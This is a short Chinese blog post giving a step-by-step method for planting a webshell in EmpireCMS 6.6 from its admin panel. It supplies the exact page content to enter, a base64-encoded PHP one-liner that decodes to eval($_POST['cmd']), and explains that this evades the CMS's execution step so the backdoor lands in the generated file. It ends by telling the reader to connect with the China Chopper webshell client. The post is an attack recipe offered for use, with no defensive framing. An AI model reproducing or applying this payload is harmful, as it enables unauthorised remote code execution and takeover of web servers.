帝国cms 6.6后台拿webshell方法

进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>

如果内容直接添一句话或者php大马是没有用的,,因为他会生成qxz.php前先给你执行!!
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST[‘cmd’]);?> 的base64加密。
所以生成qxz.php后 会出现内容 <?php @eval($_POST[‘cmd’]);?> 在文件里,然后用菜刀直接连接就会看到你想要的结果了哈哈!

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3290.html